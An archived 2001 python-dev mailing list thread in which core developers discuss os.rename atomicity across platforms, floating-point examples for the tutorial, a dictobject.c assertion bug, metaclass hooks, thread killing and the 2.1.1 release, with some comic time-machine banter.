<200105222346.f4MNkr104833@odiug.digicool.com> Message-ID: <20010522203311.E1245@gerg.ca> On 22 May 2001, Guido van Rossum said: > I would prefer to document the difference so applications can decide > how to deal with this. I agree -- it has always seemed to me that the standard library merely exposes the underlying OS functionality for you. This puts portability somewhat in the hands of the application writer -- with power comes responsibility.
I think that's the way it should be; any attempt to convert OS A to the semantics of OS B will fall down somewhere. Witness the loss-of-atomicity in Guido's example. I'm sure any other semantic difference between OSes would have similar "gotchas" if we attempted to paper over them. Greg -- Greg Ward - just another Python hacker gward at python.net http://starship.python.net/~gward/ Beware of altruism. It is based on self-deception, the root of all evil. From tim.one at home.com Wed May 23 08:31:29 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 02:31:29 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <20010522094157.A1245@gerg.ca> Message-ID: [Greg Ward, on http://www.lahey.com/float.htm] > I found this article more useful, interesting, and informative than > whatever I learned about binary floating-point in my academic years. > Good link, Tim. Two catches: > > * I can just barely follow the FORTRAN examples; I very much doubt > the average Python newbie would have any more luck than me The goal is to frighten them: the ones with the right stuff to use fp without destroying a satellite, bringing down the Internet, designing a pacemaker that fails when rounding a corner clockwise at 1.37g, causing a small country's economy to collapse, making jet fighters spontaneously turn upside down when crossing the equator, or triggering WW III by accident, will persist . BTW, not all of those were made up! > * I tried several of the FORTRAN examples in Python, and did not > witness any of the gotchas they are meant to illustrate. Possibly > it's just single-precision vs. double-precision difference, but > Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2 > doesn't demonstrate the same gotchas as that article does. You can't illustrate the last half of their examples in Python without playing obscure games with the struct module, because they rely on the existence of more than one size of floating-point type. 
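The "obscure games with the struct module" can be as simple as packing a Python float (a C double) with the single-precision format code 'f' and unpacking it again. The pack step rounds to the nearest 32-bit float, and unpacking widens that value back to a double exactly. A minimal sketch in present-day Python; the helper name `to_single` is hypothetical.

```python
import struct

def to_single(x):
    """Round a Python float (a C double) to IEEE single precision and back.

    Hypothetical helper: packing with the 'f' format code rounds to the
    nearest 32-bit float; unpacking widens it, exactly, to a double again.
    """
    return struct.unpack("f", struct.pack("f", x))[0]


single = to_single(0.1)
print(repr(0.1))      # 0.1
print(repr(single))   # 0.10000000149011612
print(single == 0.1)  # False: single and double round 1/10 to different values
```

Values that are exact in both formats, such as 0.5, survive the round trip unchanged, which is why the article's single-precision gotchas need different numbers to show up in double precision.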
Your lack of luck with the first half of their examples is indeed solely due to the fact that he used single-precision examples and Python's float is double. You need to find different numbers to show the same things in Python; like so: # Binary Floating Point x = 100000000000. * 0.00000000001 if x != 1.0: print "Oops! It's %r" % x # Inexactness a = 98. / 49. reciprocal = 1./49. b = 98. * reciprocal if a != b: print "Oops! They're %r and %r" % (a, b) # Crazy Conversions x = 32.05 y = x * 100. # "looks like" 3205. if display rounded i = int(y) # actually truncates to 3204 print y, i, repr(y) It's Real Work coming up with stuff like that. What I'm hearing is that people won't understand it anyway -- so screw it. If they want an education, they can prove it by doing a google search <0.6 wink>. From tim.one at home.com Wed May 23 08:44:14 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 02:44:14 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com> Message-ID: [Guido] > ... > I certainly wouldn't want to try to emulate the Windows semantics on > Unix. However, I think that emulating the correct Posix semantics on > Windows is not possible either. Neither is it desirable: Windows isn't POSIX, and Windows users would be appalled if os.rename() could silently destroy files. If such a function needs to exist, create a new cowboy_unix_tricks module instead . This has never been a problem for me because I always check to see whether the target file exists before using os.rename(), and do something else if it does. I understand that's vulnerable to races, but nobody asked whether I cared about that . > The Posix rename() call guarantees that it is atomic: there is no > point in time where the file doesn't exist at all (and a system or > program crash can't delete the file). I wouldn't know how to do
I wouldn't know how to do > that in Windows -- the straightforward version > > if os.path.exists(target): > os.unlink(target) > os.rename(source, target) > > leaves a vulnerability open where the target doesn't exist and if at > that point the system crashes or the program is killed, you lose the > target. More obvious, it also fails if target simply exists and is open (you can't unlink an open file on Windows). Nevertheless, you can do this renaming safely on Windows, via doing the right system magic to make rename happen at reboot time before Windows actually starts. But I'm not sure Skip's client would want to reboot each time Python did a file rename . > I would prefer to document the difference so applications can decide > how to deal with this. Yup! From MarkH at ActiveState.com Wed May 23 10:55:17 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Wed, 23 May 2001 18:55:17 +1000 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: [Tim on a subject near and dear to his testicles] > It's Real Work coming up with stuff like that. What I'm hearing is that > people won't understand it anyway -- so screw it. If they want > an education, > they can prove it by doing a google search <0.6 wink>. I am inclined to agree. IMO, The Python tutorial or other documentation should include a basic example of these "errors", and a link to _either_ of the HTML pages referenced in this thread as an optional extra. Just enough to stop _most_ of the "this is a bug" posts - but stopping well short of any attempt to "educate" them in floating point madness. Just _one_ example of floats not being exact would suffice. Going from my personal experience, I learnt long ago that floating point is not exact. That is all I needed to know to move on. I didn't like it, and I didn't understand exactly why (I thought I did, but Tim put a stop to that misconception ), but I could move on once I had that skerrick of enlightenment. 
And believe it or not, some of my code _does_ use floats, and _does_ work! (well, works as well as the rest of my code anyway ) And-it-wasn't-even-Python-that-taught-me, Mark. From pf at artcom-gmbh.de Wed May 23 09:49:13 2001 From: pf at artcom-gmbh.de (Peter Funk) Date: Wed, 23 May 2001 09:49:13 +0200 (MEST) Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> from "Fred L. Drake, Jr." at "May 22, 2001 06:04:11 pm" Message-ID: Hi, Fred L. Drake, Jr. wrote: > skip at pobox.com writes: > > On the (unsupportable) theory that to-date, more Python apps have been > > written and/or deployed on Unix-like systems and that where Windows apps are > > concerned, many developers will have added a thin wrapper to mimic the Unix > > semantics, I think less breakage would result if the Unix semantics were > > I don't know whether there are more deployed Python apps on Unix > than on Windows (and I've no good idea about how to find out), but I > think unifying the semantics one way or the other is a good thing. > Regardless of which set of semantics is chosen. I agree. May I suggest to add an optional third boolean parameter to os.rename called 'replace', which defaults either to TRUE or FALSE, so modifying existing apps will become even less hassle to potential porters. Here is a strawman to explain what I mean: -------------------------------------- import os def new_rename(src, dst, replace=0, old_rename=os.rename): if os.path.exists(dst): if replace: if not os.path.isdir(dst): os.remove(dst) else: # I'm not sure what to do here. recursive removal? dangerous!
raise NotImplementedError else: raise OSError("%s already exists" % dst) return old_rename(src, dst) os.rename = new_rename -------------------------------------- Regards, Peter -- Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260 office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany) From jack at oratrix.nl Wed May 23 13:15:10 2001 From: jack at oratrix.nl (Jack Jansen) Date: Wed, 23 May 2001 13:15:10 +0200 Subject: [Python-Dev] Assertion failed in dictobject.c Message-ID: <20010523111510.D504D3B8999@snelboot.oratrix.nl> I'm seeing the assert on line 525 in dictobject.c (revision 2.92) failing. The debugger tells me that ma_fill and ma_size are both 8. ma_used is 2, and interestingly hash is also 8. Going back to revision 2.90 fixes the problem (or masks it). -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From skip at pobox.com Wed May 23 13:59:45 2001 From: skip at pobox.com (skip at pobox.com) Date: Wed, 23 May 2001 06:59:45 -0500 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: References: <200105222346.f4MNkr104833@odiug.digicool.com> Message-ID: <15115.42545.172775.716565@beluga.mojam.com> >>>>> "Tim" == Tim Peters writes: Tim> [Guido] >> I would prefer to document the difference so applications can decide >> how to deal with this. Tim> Yup! Submitted as patch #426598, assigned to Dr. Doc (aka Fred). Skip From skip at pobox.com Wed May 23 14:11:51 2001 From: skip at pobox.com (skip at pobox.com) Date: Wed, 23 May 2001 07:11:51 -0500 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: References: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> Message-ID: <15115.43271.480135.227059@beluga.mojam.com> Peter> I agree. 
May I suggest to add an optional third boolean Peter> parameter to os.rename called 'replace', which defaults either to Peter> TRUE or FALSE, so modifying existing apps will become even less Peter> hassle to potential porters. In his response to my post, Guido indicated there is a race condition. Between the time you delete the preexisting destination file and do the actual file rename, Windows could wink out on you, leaving you with the original src file and no original dst file. POSIX semantics require the rename to be atomic. This is just not going to be possible. Fred, perhaps my doc mod should be enhanced to identify the race condition for people who need to use os.rename on Windows and will be forced to first unlink the destination file. Skip From guido at digicool.com Wed May 23 15:19:24 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 09:19:24 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Wed, 23 May 2001 02:31:29 EDT." References: Message-ID: <200105231319.f4NDJOs06485@odiug.digicool.com> I liked the text that Tim posted to SF, but I would like it even better if it also *contained* the text from the "RepresentationError" moinmoin wiki page, rather than referring to it by URL. The moinmoin URL is not a good long-term name for that information -- printed copies of the tutorial will persist long after the moinmoin wiki has been moved or consolidated. Plus, instead of referring people to the moinmoin wiki page, I'd like to be able to refer them to the appendix of the tutorial! --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 23 15:32:17 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 09:32:17 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Wed, 23 May 2001 18:55:17 +1000."
References: Message-ID: <200105231332.f4NDWH706564@odiug.digicool.com> [Mark] > IMO, the Python tutorial or other documentation should include a basic > example of these "errors", and a link to _either_ of the HTML pages > referenced in this thread as an optional extra. > > Just enough to stop _most_ of the "this is a bug" posts - but > stopping well short of any attempt to "educate" them in floating > point madness. Just _one_ example of floats not being exact would > suffice. I agree: we don't have to explain *why* it happens. We just have to explain *that* it happens, so folks don't think they've discovered a bug in Python. Or maybe we could do this: in the main text, explain and show *that* it happens, and refer to the appendix which can explain *why* it happens to those interested, in a gentle manner like what Tim already wrote. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 23 15:52:02 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 09:52:02 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: Your message of "Wed, 23 May 2001 09:49:13 +0200." References: Message-ID: <200105231352.f4NDq3g06738@odiug.digicool.com> > May I suggest to add an optional third boolean parameter to > os.rename called 'replace', which defaults either to TRUE or FALSE, > so modifying existing apps will become even less hassle to potential > porters. I see no reason to change the API. In any case, for backwards compatibility, the default would have to be platform dependent, which strikes me as just as bad as the current situation.
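Skip's race condition is easiest to see in code. The following is a minimal Python 3 sketch of the delete-then-rename fallback the thread describes; `rename_replacing` is a hypothetical helper name (not part of the os module), and the sketch assumes src and dst are plain files on the same filesystem.

```python
import os

def rename_replacing(src, dst):
    """Rename src to dst, overwriting dst if it already exists.

    Hypothetical helper sketching the two-step workaround discussed in
    this thread.  It is NOT atomic: if the process dies between the
    unlink and the second rename, dst is gone and only src remains.
    """
    try:
        os.rename(src, dst)      # POSIX: replaces an existing dst atomically
    except OSError:
        if not os.path.exists(dst):
            raise                # the failure was not caused by an existing dst
        os.unlink(dst)           # race window opens here...
        os.rename(src, dst)      # ...and closes here
```

Later Python versions (3.3 and up) added os.replace(), which overwrites an existing destination file on both POSIX and Windows, so new code should prefer it over a hand-rolled fallback like this one.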
--Guido van Rossum (home page: http://www.python.org/~guido/) From thomas at xs4all.net Wed May 23 16:00:25 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 23 May 2001 16:00:25 +0200 Subject: [Python-Dev] Python 2.1.1 Message-ID: <20010523160025.B690@xs4all.nl> As those of you on python-checkins might have noticed ;) I started checking in Python 2.1.1 bugfixes. I'd hoped to finish all of my backlog today, but unfortunately I'm now called away on a surprise emergency meeting, so I'm not sure if I'll make it. The 2.1.1 tree is in a somewhat unstable state right now; I'll fix that today in any case, but after the meeting. (As for why I started doing it: I just spent about two weeks digging through Pine source code, and its imap server in particular, and I decided I deserved a break -- Python reads like a Heinlein novel, after pine code: readable, straightforward, and just enough complexity to keep it entertaining :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From aahz at rahul.net Wed May 23 16:08:45 2001 From: aahz at rahul.net (Aahz Maruch) Date: Wed, 23 May 2001 07:08:45 -0700 (PDT) Subject: [Python-Dev] Killing threads Message-ID: <20010523140845.B092299C83@waltz.rahul.net> Okay, so we all know it isn't possible to kill threads cleanly and safely in any kind of cross-platform way. At the same time, a program that has a thread running haywire should be able to kill itself completely, so that a monitoring process can restart it. How hard would it be to do only that in a cross-platform way? I'm guessing that for Unix, we'd just send a hard signal (9 or 15). No clue what would need to happen for Windows and Mac. (This got brought up because I experimented with os._exit() as a possible solution, but that GPFs on Win98SE.)
-- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From thomas.heller at ion-tof.com Wed May 23 19:28:07 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 23 May 2001 19:28:07 +0200 Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods)) References: Message-ID: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> [this message has also been posted to comp.lang.python] Guido's metaclass hook in Python goes this way: If a base class (let's better call it a 'base object') has a __class__ attribute, this is called to create the new class. From guido at digicool.com Wed May 23 20:02:06 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 14:02:06 -0400 Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods)) In-Reply-To: Your message of "Wed, 23 May 2001 19:28:07 +0200." <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> References: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> Message-ID: <200105231802.f4NI26408784@odiug.digicool.com> > [this message has also been posted to comp.lang.python] [And I'm cc'ing there] > Guido's metaclass hook in Python goes this way: > > If a base class (let's better call it a 'base object') > has a __class__ attribute, this is called to create the > new class. > > >From demo/metaclasses/index.html: > > class C(B): > a = 1 > b = 2 > > Assuming B has a __class__ attribute, this translates into: > > C = B.__class__('C', (B,), {'a': 1, 'b': 2}) Yes. > Usually B is an instance of a normal class. No, B should behave like a class, which makes it an instance of a metaclass. 
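Guido's point, that the hook call `C = B.__class__('C', (B,), {'a': 1, 'b': 2})` produces an instance of a metaclass (a new subclass of B) rather than an instance of B, can be checked directly in modern Python, where a class's `__class__` is its metaclass (by default `type`). This is a minimal Python 3 sketch, not the 2.1 hook itself; the name `MyClass` is borrowed from Guido's descr-branch example in this reply, and the `made_by` attribute it injects is purely illustrative.

```python
class B:
    pass

# An ordinary class statement...
class C(B):
    a = 1
    b = 2

# ...builds (roughly) what the explicit metaclass call builds.
# For a class object, B.__class__ is its metaclass, here `type`.
C2 = B.__class__('C2', (B,), {'a': 1, 'b': 2})

# Subclassing an existing metaclass instead of simulating one by hand.
class MyClass(type):
    def __new__(mcls, name, bases, namespace):
        namespace = dict(namespace)
        namespace.setdefault('made_by', mcls.__name__)  # illustrative only
        return super().__new__(mcls, name, bases, namespace)

MyObject = MyClass('MyObject', (), {})   # a class whose metaclass is MyClass
myInstance = MyObject()                  # an ordinary instance of MyObject
```

Note that C2 is a subclass of B, not an instance of it, which is exactly the subclassing-versus-instantiation distinction Guido stresses.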
> So the above code will create an instance of B, > call B's __init__ method with 'C', (B,), and {'a': 1, 'b': 2}, > and assign the instance of B to the variable C. No, it will not create an instance of B. It will create an instance of B.__class__, which is a subclass of B. The difference between subclassing and instantiation is confusing, but crucial, when talking about metaclasses! See the ASCII art in my classic post to the types-sig: http://mail.python.org/pipermail/types-sig/1998-November/000084.html > I've played with this metaclass hook ever since, and > always found the problem that B would have to completely > simulate the normal python behaviour for classes (modifying > of course what you want to change). > > The problem is that there are a lot of successful and > unsuccessful attribute lookups, which require a lot > of overhead when implemented in Python: So the result > is very slow (too slow to be usable in some cases). Yes. You should be able to subclass an existing metaclass! Fortunately, in the descr-branch code in CVS, this is possible. I haven't explored it much yet, but it should be possible to do things like:

    Integer = type(0)
    Class = Integer.__class__   # same as type(Integer)

    class MyClass(Class):
        ...

    MyObject = MyClass("MyObject", (), {})

    myInstance = MyObject()

Here MyClass declares a metaclass, and MyObject is a regular class that uses MyClass for its metaclass. Then, myInstance is an instance of MyObject. See the end of PEP 252 for info on getting the descr-branch code (http://python.sourceforge.net/peps/pep-0252.html). > ------ > > Python 2.1 allows attaching attributes to function objects, > so a new metaclass pattern can be implemented. > > The idea is to let B be a function having a __class__ attribute > (which does _not_ have to be a class, it can again be a function). Oh, yuck.
I suppose this is fine if you want to experiment with metaclasses in 2.1, but please consider using the descr-branch code instead so you can see what 2.2 will be like! --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 23 20:40:58 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 23 May 2001 20:40:58 +0200 Subject: [Python-Dev] Daily Python URL on your Palm Message-ID: <3B0C043A.D5C9C604@lemburg.com> Just thought you might want to know that Fredrik's Daily Python URL can be downloaded onto the Palm as Avantgo Channel. Here's the URL for adding the channel: http://avantgo.com/mydevice/autoadd.html?title=Daily%20Python%20URL&url=http%3A%2F%2Fwww.pythonware.com%2Fdaily%2Findex.htm&max=100&depth=1&images=0&links=1&refresh=always&hours=1&dflags=0&hour=0&quarter=00&s=00 PS: Would be nice if Fredrik could provide a "printable" version of the Daily URL page, since the table layout doesn't work too well on the small Palm display. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller at ion-tof.com Wed May 23 20:57:28 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 23 May 2001 20:57:28 +0200 Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods)) References: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> <200105231802.f4NI26408784@odiug.digicool.com> Message-ID: <033901c0e3ba$36aaa870$e000a8c0@thomasnotebook> Let me try again (and please forgive my mistakes in the detail). The usual way (as in demo\metaclasses): class B_Meta: .... B = B_Meta('B', (), {}) class C(B): pass B is an instance of the (meta)class B_Meta. C is now another instance of the same (meta)class. because B.__class__, which is the (meta)class itself, is called, and returns a new instance. 
B_Meta can (and must) implement a lot of behaviour. In contrast, with my recipe:

    def MagicFunction(name, bases, dict):
        ...construct a class on the fly...
        ...create an instance of this class...
        return an_instance_of_a_class

    def B():
        pass
    B.__class__ = MagicFunction

    class C(B):
        pass

Now C is an_instance_of_a_class (which is an instance of a normal python class), and thus does inherit the normal behaviour of Python classes. Thomas PS: I'm sure this all will be much better in descr-branch. I've checked it out and am playing with it from time to time, but most of the time I have to use released Python versions. From tim.one at home.com Wed May 23 21:32:59 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 15:32:59 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <20010523160025.B690@xs4all.nl> Message-ID: [Thomas Wouters] > > As those of you on python-checkins might have noticed ;) I started > checking in Python 2.1.1 bugfixes. And bless you for it, Thomas! > I'd hoped to finish all of my backlog today, but unfortunately I'm > now called away on a surprise emergency meeting, Now that sucks. Tell your manager that you'll only attend planned emergency meetings from now on: Guido plans Python crises years in advance, and it shows in the relative cleanliness of the Python codebase . From nas at python.ca Wed May 23 21:41:14 2001 From: nas at python.ca (Neil Schemenauer) Date: Wed, 23 May 2001 12:41:14 -0700 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: ; from tim.one@home.com on Wed, May 23, 2001 at 03:32:59PM -0400 References: <20010523160025.B690@xs4all.nl> Message-ID: <20010523124114.A4747@glacier.fnational.com> Tim Peters wrote: > Guido plans Python crises years in advance, and it shows in the > relative cleanliness of the Python codebase . I don't think Thomas has a time machine.
Neil From tim.one at home.com Wed May 23 21:45:06 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 15:45:06 -0400 Subject: [Python-Dev] Killing threads In-Reply-To: <20010523140845.B092299C83@waltz.rahul.net> Message-ID: [Aahz] > Okay, so we all know it isn't possible to kill threads cleanly and > safely in any kind of cross-platform way. At the same time, a program > that has a thread running haywire should be able to kill itself > completely, so that a monitoring process can restart it. How hard would > it be to do only that in a cross-platform way? Since Python is written in C, and C says nothing about this, you need a platform expert for each platform covered by "cross" . > I'm guessing that for Unix, we'd just send a hard signal (9 or 15). No > clue what would need to happen for Windows and Mac. > > (This got brought up because I experimented with os._exit() as a > possible solution, but that GPFs on Win98SE.) Please open a bug report on that, then, with a tiny test case if possible. This worked fine on Win98SE for me just now:

    import thread, os, time

    def task():
        while 1:
            print "x",
            time.sleep(.1)

    for i in range(10):
        thread.start_new_thread(task, ())

    time.sleep(5)
    os._exit(1)

Windows kills all threads spawned by a process when "the main thread" exits. You don't need to do os._exit(), and sys.exit() is normally a much better idea (else, e.g., stdio buffers may not get flushed to disk).
From thomas at xs4all.net Wed May 23 22:27:51 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 23 May 2001 22:27:51 +0200 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <20010523124114.A4747@glacier.fnational.com>; from nas@python.ca on Wed, May 23, 2001 at 12:41:14PM -0700 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> Message-ID: <20010523222751.G690@xs4all.nl> On Wed, May 23, 2001 at 12:41:14PM -0700, Neil Schemenauer wrote: > Tim Peters wrote: > > Guido plans Python crises years in advance, and it shows in the > > relative cleanliness of the Python codebase . > > I don't think Thomas has a time machine. *Don't* get me started on that. If only Guido would stop hogging the damned thing, I could be a 34-year-old millionaire in a 10-room house and 8 girlfriends ! Now-I'm-short-ten-years-nine-million-eight-rooms-and-seven-girlfriends-ly y'rs, -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From tim.one at home.com Wed May 23 22:32:04 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 16:32:04 -0400 Subject: [Python-Dev] Assertion failed in dictobject.c In-Reply-To: <20010523111510.D504D3B8999@snelboot.oratrix.nl> Message-ID: [Jack Jansen] > I'm seeing the assert on line 525 in dictobject.c (revision 2.92) > failing. The debugger tells me that ma_fill and ma_size are both 8. > ma_used is 2, and interestingly hash is also 8. You wouldn't happen to have a reproducible test case? That hash==8 is almost certainly a red herring -- or a sign of wild stores . > Going back to revision 2.90 fixes the problem (or masks it). Instead of:

    assert(mp->ma_fill < mp->ma_size);

this code used to be:

    if (mp->ma_fill >= mp->ma_size) {
        /* No room for a new key.
         * This only happens when the dict is empty.
         * Let dictresize() create a minimal dict.
         */
        assert(mp->ma_used == 0);
        if (dictresize(mp, 0) != 0)
            return -1;
        assert(mp->ma_fill < mp->ma_size);
    }

so the dict would get resized whenever ma_fill >= ma_size, although the code only *expected* that to happen when the dict table was NULL. It was perhaps happening in other cases too. The dict is never empty (NULL) after the patch, so the special case for "empty" got replaced by an assert. Offhand I don't see how this could be triggering -- although *something* about the 2.90 logic makes me uneasy! Ah, mp->ma_fill >= mp->ma_size wasn't a correct test: filled slots that aren't used slots don't stop a new key from being added. Assuming that's it, 2.90 could do needless calls to dictresize, but the new version does a bogus assert instead. So replace the current version's offending

    assert(mp->ma_fill < mp->ma_size);

with

    assert(mp->ma_used < mp->ma_size);

Let me know whether that solves it. 2.90 may also suffer a bogus

    assert(mp->ma_used == 0);

failure. It's not easy to provoke any of this, though (requires exactly the right sequence of mixed inserts and deletes, with hash codes hitting exactly the right dict slots). From barry at digicool.com Wed May 23 22:52:22 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 23 May 2001 16:52:22 -0400 Subject: [Python-Dev] Python 2.1.1 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> Message-ID: <15116.8966.324136.897953@anthem.wooz.org> >>>>> "TW" == Thomas Wouters writes: TW> *Don't* get me started on that. If only Guido would stop TW> hogging the damned thing, I could be a 34-year-old millionaire TW> in a 10-room house and 8 girlfriends ! It's really not as easy as all that, though. When Guido's not around, I've been known to, er, take The Machine for a spin (sshh! Do /not/ tell him!).
The first time I did, I didn't realize that the blue toggle had to be in the down position, and when I stepped out, everybody was speaking Esperanto, had half their heads shaved, and were toting around what looked like a cross between a dog and a beach ball (it drooled incessantly). Fortunately, The Machine has a reset button (oddly labeled "History Erase Button" and guarded by a candy-crazed TV announcer-like automaton who must be coaxed from the button with a marshmallow s'more). The second time I used it, I'd forgotten that you must keep your left hand on the silver sphere while you line up the parallel lines with the lip-actuated alpha wheel. Silly me, I'd removed my left hand just before alignment in order to twist the fluoroscopic reflection tube a quarter rotation out of phase (rule of thumb: never listen to that automaton when he's licked the last of the chocolate-y goo from his fingers. He'll say anything to get another s'more.) You really don't want to know what that particular world looked like, but let's just say it involved lots and lots of angry elephants. So now I leave well enough alone, and I've learned that if you really want to change the past, just wait for Guido to use it for his own nefarious purposes, and tape a sign to his back requesting the (very modest) change to the continuum that you're looking for. And don't forget to smear the front of that sign with s'more. -Barry From tim.one at home.com Wed May 23 23:02:17 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 17:02:17 -0400 Subject: [Python-Dev] Assertion failed in dictobject.c In-Reply-To: Message-ID: [Jack Jansen] > I'm seeing the assert on line 525 in dictobject.c (revision 2.92) > failing. The debugger tells me that ma_fill and ma_size are both 8. > ma_used is 2, and interestingly hash is also 8. [Tim] > You wouldn't happen to have a reproducible test case?
Never mind; I do:

    d = {}
    for i in range(5):
        d[i] = i
    for i in range(5):
        del d[i]
    for i in range(5, 9):   # assert triggers when i == 8
        d[i] = i

The cure is more complicated than I described, though. From esr at thyrsus.com Thu May 24 00:39:49 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 23 May 2001 18:39:49 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> Message-ID: <20010523183949.A19251@thyrsus.com> Barry A. Warsaw : > You really don't want to know what that particular world looked like, > but let's just say it involved lots and lots of angry elephants. You've been *there*? Dang...that's the timeline that scared me into hanging up my lab coat. It was a slow Saturday and I was hatching Sinister Plan For World Domination number 4. What happened to the other three? Well...I had been planning to terrorize the western U.S. with a giant mechanical spider, until some guys from Hollywood offered me way too much money for it. The trained army of radioactive gorillas I spent the movie money on didn't work out -- my Igor flatly refused to shovel any more radioactive gorilla poop, and you know how hard it is to get good help these days. Blackmailing major cities with a Zeppelin-mounted death ray projector sounded cool but Radio Shack was out of the parts. OK, so plan #4 was to create voracious mega-amoebas using my Ionic Mutatron and send them out to destroy all my enemies, especially that kid who beat me up in third grade. There I was, cackling insanely, just about to unleash these slimy horrors on an unsuspecting world to wreak havoc and destruction, when the eka-rhodium electrodes on the Mutatron arced over.
This produced a wild spike of temporokinetic energy, and guess where *I* was standing? Silly me. Before you could say "plot complication" I was materializing in the Hyraxeum -- damn near nose-to-trunk with the High Pachyderm himself, as it turned out, who was getting wound up to try out his newest human-goad on a mahout they had just captured from the Fortified Cities. The mahout was terrified out of his wits, and you would have been too if you'd seen what the High Pachyderm's tusks were covered with and the lascivious way his trunk was curled around that cheese grater. Euggghhh... It was crazy. The High Pachyderm was trumpeting like mad, tuskers charging at me from all directions, and me with at least 5.23 seconds to go until the temporokinetic charge wore off. Fortunately I remembered that elephants communicate using modulated infrasonics that they hear with the flat part of their foreheads, and I had my trusty sonic screwdriver on me. I set it to "infra" at maximum volume and hurled it at the High Pachyderm -- hit the bugger right in the tiara. He went berserk and his confused guards started crashing into each other left and right, which was a pretty impressive sight since the smallest of them weighed over two and a half tons. It was touch and go there, let me tell you. I caught one glimpse of the mahout's rapidly-retreating heels just as the charge wore off and I was slingshotted back to my lab. My sonic screwdriver, of course, followed within seconds -- horribly crushed and mangled. And that's when I swore off building fiendish devices. Electrocution I can laugh at, having my monstrous creations turn on me is all in a day's work, and that one time I was accidentally transformed into a fly I found some truly remarkable uses for a three-foot-long prehensile tongue. But what the High Pachyderm had planned was too twisted even for *me*. I decided Sinister Plan #5 would have to be a bit less hardware-intensive, if only as a rest for my frazzled nerves. 
